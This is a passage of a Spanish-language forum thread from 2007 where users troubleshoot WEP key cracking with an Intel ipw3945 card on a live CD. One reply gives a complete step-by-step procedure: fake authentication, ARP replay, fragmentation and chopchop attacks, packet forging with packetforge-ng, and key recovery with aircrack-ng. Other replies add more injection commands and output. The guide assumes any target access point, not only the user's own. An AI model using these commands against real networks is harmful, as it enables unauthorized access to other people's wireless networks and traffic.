Autor Tema: Video + Manual: Inyeccion ipw3945  (Leído 93065 veces)

0 Usuarios y 1 Visitante están viendo este tema.

chacki

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #60 en: 28-05-2007, 20:33 (Lunes) »
Hola amigos!!!

A mi tambien me da problemas es script.

Cuando lo ejecuto me dice que no encuentra los archivos rate, channel y bssid.

he mirado a ver si estan esos archivos y efectivamente no estan.

Dentro del directorio /sys/class/net/ tengo los directorios ath0, ath1, wifi0 y eth1 (es decir uno por interface)

Pues no encuentro esos archivos dentro de ninguna interfaz...

He probado a crearlos manualmente dentro de /sys/class/net/ath1/device y no hay manera, no me deja.

PD: uso la interfaz ath1 para sniffar, la creo con wlanconfig en modo monitor, es la unica manera que tengo de poner la tarjeta de red en modo monitor.

Alguien me puede ayudar??

Gracias.




chacki

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #61 en: 28-05-2007, 20:38 (Lunes) »
Hola Southern,
yo no se mucho pero...

me parece que para empezar estas utilizando la interfaz incorrecta no?

si haces un iwconfig a secas, te dice que eth1 es una interfaz wireless?

Normalmente esa es la ethernet.

PD: Perdon por duplicar el mensaje anterior.

hadrianweb

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #62 en: 28-05-2007, 21:03 (Lunes) »
Chucki la interfaz que tienes que utilizar es rtap0 y wifi0 esta ultima para la inyeccion, y no la ath0 o ath1 como tu dices

chacki

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #63 en: 28-05-2007, 21:18 (Lunes) »
Hola Hadrianweb,

la interfaz rtap0 no me sale, la wifi0 sí.

Pero el caso es que dentro del directorio /sys/class/net/wifi0/device   no tengo los archivos channel, bssid y rate.

Porque no los tengo??



hadrianweb

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #64 en: 28-05-2007, 21:54 (Lunes) »
1º) Porque no tienes bien cargado el live cd, probable consecuencia de un mal grabado (lo mas seguro)

2º) Porque tienes desactivada la tarjeta wifi, es decir, dale al botoncito del portatil con el cual la activas

KuaSha

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #65 en: 28-05-2007, 22:32 (Lunes) »
Hola.....disculpa hadrianweb pero he estado fuera y no he podido probar lo q me indicaste. Hoy he realizado las pruebas.....y como bien me digiste lo he dejado subir mas los ARP, y lo resultados siguen igual.

1ª Hora corriendo :

read 220.300 packets (got 155 ARP)  37 pps  (archivo.cap - 22 mb)

2ª Hora corriendo :

read 232.500 packets (got 162 ARP)  37 pps  (archivo.cap - 28 mb)

3ª Hora corriendo :

read 300.000 packets (got 175 ARP)   37 pps  (archivo.cap - 41 mb)

al lanzar el aircrack, lo unico q varia son los packets, lo demas esta todo igual.
1. 1900
2. 2474
3. 2597

Otra cosa queria preguntarte....al definir el archivo cap en el airodump hay q poner o es necesario el parametro IVS.

Luego en la carga del live aparece este error....

mount cánt  sys / etc / fsbab  or  etc / mtb            ( failed )

Puede estar relacionado ? q puede ser.

salu2.

hadrianweb

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #66 en: 29-05-2007, 00:00 (Martes) »
No el error ese que dices no se debe a eso.

Y se supone que lo estas haciendo bien, lo que ocurre es que no te inyecta muy rapido ;D ;D

KuaSha

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #67 en: 29-05-2007, 14:23 (Martes) »
ya...entonces, q significa y q puedo hacer para solucionarlo. Xq la tarjeta del portatil no creo q este mal, aún asi, hay alguna forma d realizarla algún tipo d test d verificación.

salu2.

hadrianweb

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #68 en: 29-05-2007, 19:47 (Martes) »
Una cosa es probable que no esteas bien auntentificado comprueba eso

KuaSha

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #69 en: 29-05-2007, 21:55 (Martes) »
perdoname hadrian.....pero estoy totalmente desorientado y confuso, ya no se q mas hacer. Me podrias indicar como hacerlo.

T agradezco d antemano tu preciada ayuda.

hadrianweb

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #70 en: 30-05-2007, 02:01 (Miércoles) »
Pues mira este es el comando

Código: [Seleccionar]
aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
So te funciona debe de aparecete una cara asi :-) sino puede significar que el rate no estra cambiado o que estas muy lejos del ap, o que el router no es vulnerable a ese ataque ...etc

KuaSha

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #71 en: 31-05-2007, 14:57 (Jueves) »
Hola d nuevo..... esto cada vez es mas raro....t pongo los pasos q hago.
1. En el arranq he puesto los 3 tipos d teclados o juego d caracteres.
2.entro con startx
3. abro terminal :ipw3945.sh
canal 6 - rate 2 - bssid
4. airodump-ng -c 6 -w nombre rtap0 ......dejo corriendo
5.aireplay-ng -1 0 -a bssid -h mimac -e essid wifi0.....dejo abierto

con este el resultado es el siguiente :
hora : waiting for beacon frame  (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful  :-)

6.aireplay-ng -3 -b bssid -h mimac wifi0.......dejo corriendo
7.aircrack-ptw nombre-01.cap

esto aparece
allocating a new table
bssid = xx:01  (mia)     keyindex=0
allocating a new table
bssid = xx:02               keyindex=0
allocating a new table
bssid = xx:03               keyindex=0
stats for bssid xx:01  keyindex =0 packects=1155
stats for bssid xx:02  keyindex =0 packects=34
stats for bssid xx:03  keyindex =0 packects=1

ahora el q me digsite tu...

aireplay-ng -1 30 -a bssid -h mimac -e essid wifi0.....dejo abierto

con este el resultado es el siguiente :
hora : waiting for beacon frame  (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful  :-)
hora :sending keep alive packet
sending authentication request
sending authentication request
sending authentication request
sending authentication request

ahi se queda....... el Ap esta a unos 5 metros.



hadrianweb

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #72 en: 31-05-2007, 17:19 (Jueves) »
Citar
como lo hacias esta correctoHola d nuevo..... esto cada vez es mas raro....t pongo los pasos q hago.
1. En el arranq he puesto los 3 tipos d teclados o juego d caracteres.
2.entro con startx
3. abro terminal :ipw3945.sh
canal 6 - rate 2 - bssid
4. airodump-ng -c 6 -w nombre rtap0 ......dejo corriendo
5.aireplay-ng -1 0 -a bssid -h mimac -e essid wifi0.....dejo abierto

con este el resultado es el siguiente :
hora : waiting for beacon frame  (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful  :-)

6.aireplay-ng -3 -b bssid -h mimac wifi0.......dejo corriendo
7.aircrack-ptw nombre-01.cap

esto aparece
allocating a new table
bssid = xx:01  (mia)     keyindex=0
allocating a new table
bssid = xx:02               keyindex=0
allocating a new table
bssid = xx:03               keyindex=0
stats for bssid xx:01  keyindex =0 packects=1155
stats for bssid xx:02  keyindex =0 packects=34
stats for bssid xx:03  keyindex =0 packects=1

Aparentemente esto esta correcto, solo comprueba una cosa, si hal cambiar el rate canal y demas estos estan cambiados correctamente

mc_abel

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #73 en: 31-05-2007, 19:35 (Jueves) »
Antes que nada gracias a los que han puesto tiempo en darle soporte a wifi way wifislax y de alguna forma contribulleron a los manuales hallados en estos foros.

Los manuales estan muy buenos pero en mi caso ocurrio algo interesante que me hizo la vida imposible al intentar conseguir un WEP key:  no habian clientes conectados y aun con la falsa autenticacion no subian los ARP.  Pongo esto aqui por si alguien le ocurre lo mismo.  Lo que pongo a continuacion es una aplicacion/remix del conocimiento posteado aqui y otras web y para algunos os parecera obvio;  pero tiene algunos pasos extra para los que tengan mi problema de falta de injeccion.  Mi OS es WIN XP y uso live CD.  Asumo que el AP tiene WEP open y vosotros usuais tarjeta wifi ipw3945 :-P.

Primeramente, utilize la version 0.4 de wifiway.  la 0.6 salio JUSTO cuando acababa de bajar la 0.4 se me acabaron los discos en blanco para colmo>.>

NOTA:yo me mate buscando info por ahi y luego me entero que en esta live CD NO HAY QUE PONER LA TARJETA EN MODO MONITOR.  Se hace automaticamente.

En la version 0.6 imagino que los primeros 3 pasos no se necesitan(excepto poner el live cd DUH :-P).

I.  Desde windows correr netstumbler.  Es super rapido y dummy friendly para hallar AP's y BSSID's.  Es mi preferencia, si no os gusta usad lo que querais y pasad trabajo :-).

II.  Poner ipw3945.sh en el directorio raiz, usualmente C.  Poner live CD y dar restart.

III. Una vez en linux abrir el explorador de archivos y buscar el folder /mnt/ y una de esas va a ser la particion de windows.  Dar copy al ipw3945.sh y paste en /root.

->NOTA: talvez muchos sepan esto pero yo no hasta hace un dia, asi que aqui os va: en el folder /mnt/ pueden haber varias particiones (incluyendo USB drives me imagino). En mi caso puedo dar copy a cosas de windows pero no puedo paste cosas de linux a esa particion.  Si han comenzado el proceso de obtener IV's y se han quedado a mitad pueden darle copy a los .cap y .ivs y otras cosas que hayan creado en linux a uno de esas particiones.  Ademas pueden grabar desde windows los tutoriales con "save as web page," abrir firefox, arrastralos a la ventana y verlos desde linux.

IV.  Abrir un terminal y escribir chmod 777 ipw3945.sh <dar enter> luego escriba ./ipw3945.sh y ponga la info que le pida.



V.  Escriba en la consola:
Código: [Seleccionar]
aireplay-ng -1 0 -e NOMBRE_DEL_AP  -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
O si esto no trabaja bien
Código: [Seleccionar]
aireplay-ng -1 6000 -o 1 -q 10 -e NOMBRE_DEL_AP  -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
-Vuestro MAC se consigue  escribiendo en un terminal  /ifconfig -a
-Este ataque puede fallar de la primera asi que intente varias veces. En mi caso falla si hay un cliente externo conectado.  Aveces un buen reboot a tu maquina ayuda si no funciona.

VI.  en otra consola:
Código: [Seleccionar]
airodump-ng -w  --ivs cap rtap0 -Cap es el nombre que prefieran para guardar data capturada

VII. en otra consola:
Código: [Seleccionar]
  aireplay-ng -3  -b MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0   Con solo esto puede que le injecte.  Ese no fue mi caso asi por eso viene lo siguiente:

VIII.  Este paso puede ser hecho de la forma A o B.  Aun con el mismo AP aveces funciona el A aveces el B.  Usad uno de los dos si AL FINAL no trabaja, dar reboot y use el otro(el reboot es pq despues del procedimiento los drivers aveces no responden como uno quiere y no ataca bien)  :

A.  En otra consola:
Código: [Seleccionar]
aireplay-ng -5  -b MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0  -ESPERE un par de minutos a que esto termine.  Escriba Y (de yes) al la pregunta que le van a hacer y espere a que cree un archivo .xor  ->Apunte el nombre

B.   En otra consola EN LUGAR del paso A:
Código: [Seleccionar]
aireplay-ng -4 wifi0 -h MAC_DE_VUESTRA TARRJETA   -este ataque aveces no funciona con el -h.  Usted experimente.
-ESPERE un par de minutos a que esto termine.  Escriba Y (de yes) al la pregunta que le van a hacer y espere a que cree un archivo .xor  ->Apunte el nombre

>Anotar de estos pasos nombre de archivo con nombres de este tipo: replayX.cap la parte de X usualmente es un numero.  Sustituyalo por el que aplique a su caso
>Una ALTERNATIVA al VIIIB si ya tiene un archivo replay*.cap de una ocacion anterior es
Código: [Seleccionar]
aireplay-ng -4 wifi0 -h MAC_DE_VUESTRA TARRJETA  -r replayX.cap -donde X son unos numeros.  Sustituyalo de acuerdo a su caso.


IX.  en otra consola:
Código: [Seleccionar]
packetforge-ng -0   -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA -k 255.255.255.255 -l 255.255.255.255 -y fragmentX.xor  arpZ   >la x puede ser cualquier cosa fijarse en los archivos creados por el paso anterior
> esto es una L minuscula no e confundan-l
> arpZ puede ser lo que quieran, pero no olviden el nombre
>los ip que se muestran NO LOS CAMBIEN; la mayoria de los AP no tienen problema con ellos

X. Presionar las teclas ctrl  C en la consola que tiene corriendo al airodump(amenos que usted vea que le esta injectando pero los dudo).  Ejecute este nuevo comando:
Código: [Seleccionar]
airodump-ng -c X -bssid MAC_DEL_AP --ivs -w capture rtap0 >el nombre capture lo escojen ustedes pero capture suena bien :P

XI.  En otra consola (use la que corri el ataque -1, que estaba abierta) escriba:
Código: [Seleccionar]
aireplay-ng -2  -r arpZ TARRJETA wifi0 
>la ventana del paso VII debe estar mostrando como suben los ARP, en mi caso promedio de 400 data/segundo :-D, si no es asi recomiendodar reboot e intentar denuevo sustituyendo el paso VIII A por el B o viceversa o tratar luego.  Esto a mi NO me funciona si hay algun cliente conectado aparte del fake auth del ataque -1.  Un ataque -0 os puede da~ar el procedimiento asi que no lo hagais :-P.

XII.  ejecuten en otra consola:
Código: [Seleccionar]
aircrack-ng *.cap  X.ivs -b MAC_DEL_AP > -b MAC_DEL_AP no es necesariopero aveces no me funciona sin el :-S
>la parte de *.cap la poneis tal como esta con el * per el X.ivs depende del el o los archivos que crearonen los pasos anteriores.  Ademas el sistema cambia los nombres, usualmente capture se va a llamar capture-01.ivs o algo asi.  Por eso recomiendo ir al /root y ver todos los archivos nombrados <lo que sea>.IVS y a~adirlo al codigo en lugar de X.ivs.  Cabe notar que si hay mas de 1 pueden poner todos losque quieran ej X.ivs y.ivs z.ivs pero no acepta *.ivs a diferencia del *.cap que si lo acepta
>si han hecho todo bien al aircrack le deben estar subiendo los IV a monton, asi que esperad, Yo necesite 700,000 IV's y el WEP key era solo de 64 bit y tardo 10 minutos en colectarlos, asi que no se desesperen.
« Última modificación: 31-05-2007, 19:43 (Jueves) por mc_abel »

ruitino

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #74 en: 03-06-2007, 13:25 (Domingo) »
Porque no conseguo la autenticacion con el BSSID?

KuaSha

  • Visitante
Video + Manual: Inyeccion ipw3945
« Respuesta #75 en: 04-06-2007, 10:10 (Lunes) »
no lo logro....como puedo hacer eso q dices para comprobar el rate, canal y demas. Y sobre todo en q paso. perdona pero estoy desesperado.


salu2.

alberion

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #76 en: 07-06-2007, 02:50 (Jueves) »
excelente manual, ahora nada mas falta crear un isntalador de wifiway para que no se use siempre como live cd :P

saludos y rgacias por tal regalo! ;D

hadrianweb

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #77 en: 08-06-2007, 00:58 (Viernes) »
alberion. Bueno se hace todo lo posible ;D ;D

kuasha. Para comprobar el rate, bssid y chabnnel entras en la carpeta

/sys/class/net/wifi0/device

Y ahi lo puedes ver

cracky_n_1988

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #78 en: 29-06-2007, 20:54 (Viernes) »
Buenas a todos, queria hacer una pregunta:

Me he dispuesto a empaparme de información acerca de todo esto, ya entiendo perfectamente todos los comandos y demas, me dispongo a coger mi router, ponerle un password (el cual yo se) en intento desde el portatil con la tarjeta 3945abg desencrptarla, pero e seguido al milimetro el videomanual de hadrianweb y nada, no me captura ningun arp, si sirve de algo he usado el script envia un monton de bracom (perdonad si no lo escribo bien esque de memoria no se) y lo he dejado una hora y media y nada no sube nada,

p.d.: el portatil esta a 1metro del router.
¿que puedo hacer? hecharme una mano, se me olvidaba al router lo inyecto ya que nadie ay conectado a esa red inalambrica, muchas gracias de antemano y un saludo, espero respuestas.

hadrianweb

  • Visitante
Re: Video + Manual: Inyeccion ipw3945
« Respuesta #79 en: 30-06-2007, 15:29 (Sábado) »
Como ya hemos dicho muchas veces, quizas el problema no sea tuyo, cada router es un mundo.

Comprueba que te autentificas, ya que sino mal vamos, luego recuerda bajar el rate